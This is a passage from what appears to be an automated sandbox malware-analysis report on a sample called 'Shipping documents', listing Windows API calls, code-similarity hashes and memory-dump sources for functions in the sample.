• API ID: MessagePost$KeyboardState$InputSend
• String ID:
• API String ID: 2221674350-0
• Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
• Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
• Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
• Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
APIs
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: _wcscpy$_wcscat
• String ID:
• API String ID: 2037614760-0
• Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
• Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
• Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
• Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
APIs
• GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
• VariantCopy.OLEAUT32(?,?), ref: 00451BF8
• VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
• VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
• VariantClear.OLEAUT32(-00000058), ref: 00451CA1
• SysAllocString.OLEAUT32(00000000), ref: 00451CBA
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Variant$Copy$AllocClearErrorLastString
• String ID:
• API String ID: 960795272-0
• Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
• Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
• Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
• Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
APIs
• BeginPaint.USER32(00000000,?), ref: 00447BDF
• GetWindowRect.USER32(?,?), ref: 00447C5D
• ScreenToClient.USER32(?,?), ref: 00447C7B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
• EndPaint.USER32(?,?), ref: 00447D13
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Paint$BeginClientRectRectangleScreenViewportWindow
• String ID:
• API String ID: 4189319755-0
• Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
• Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
• Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
• Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
APIs
• SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
• SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
• SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
• InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
• GetWindowLongW.USER32(?,000000F0), ref: 004490D4
• SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: MessageSend$LongWindow$InvalidateRect
• String ID:
• API String ID: 1976402638-0
• Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
• Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
• Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
• Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
APIs
• ShowWindow.USER32(?,00000000), ref: 00440A8A
• EnableWindow.USER32(?,00000000), ref: 00440AAF
• ShowWindow.USER32(?,00000000), ref: 00440B18
• ShowWindow.USER32(?,00000004), ref: 00440B2B
• EnableWindow.USER32(?,00000001), ref: 00440B50
• SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: Window$Show$Enable$MessageSend
• String ID:
• API String ID: 642888154-0
• Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
• Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
• Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
• Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$Copy$ClearErrorLast
                                                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                                                          • API String ID: 2487901850-572801152
                                                                                                          • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                          • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                          • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                          • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                          • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                          • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                          • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                          APIs
                                                                                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                          • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                          • SendMessageW.USER32 ref: 00471AE3
                                                                                                          • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                          • String ID:
                                                                                                          • API String ID: 3611059338-0
                                                                                                          • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                          • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                          • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                          • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1640429340-0
                                                                                                          • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                          • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                          • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                          • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                          APIs
                                                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                          • _wcslen.LIBCMT ref: 004438CD
                                                                                                          • _wcslen.LIBCMT ref: 004438E6
                                                                                                          • _wcstok.LIBCMT ref: 004438F8
                                                                                                          • _wcslen.LIBCMT ref: 0044390C
                                                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                                                          • _wcstok.LIBCMT ref: 00443931
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3632110297-0
                                                                                                          • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                          • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                                                          • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                                                          • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 752480666-0
                                                                                                          • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                          • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                                          • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                          • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                          • String ID:
                                                                                                          • API String ID: 3275902921-0
                                                                                                          • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                          • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                                          • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                          • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                          • String ID:
                                                                                                          • API String ID: 3275902921-0
                                                                                                          • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                          • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                                          • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                          • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
APIs
• Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
• QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
• Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
• Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
• Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
APIs
• SendMessageW.USER32 ref: 004555C7
• SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: DeleteDestroyMessageObjectSend$IconWindow
• String ID:
• API String ID: 3691411573-0
• Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
• Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
• Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
• Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
• LineTo.GDI32(?,?,?), ref: 004472AC
• MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
• LineTo.GDI32(?,?,?), ref: 004472C6
• EndPath.GDI32(?), ref: 004472D6
• StrokePath.GDI32(?), ref: 004472E4
Memory Dump Source
• Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
Similarity
• API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
• String ID:
• API String ID: 372113273-0
• Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
